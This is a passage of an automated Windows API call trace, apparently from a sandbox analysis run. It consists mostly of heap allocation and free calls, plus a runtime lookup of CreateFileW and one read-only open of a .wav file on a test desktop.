0x43e25f0 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.329] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.342] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0118.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.342] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0118.343] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\1ytxnppgwwg.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.345] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.346] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.346] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.347] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 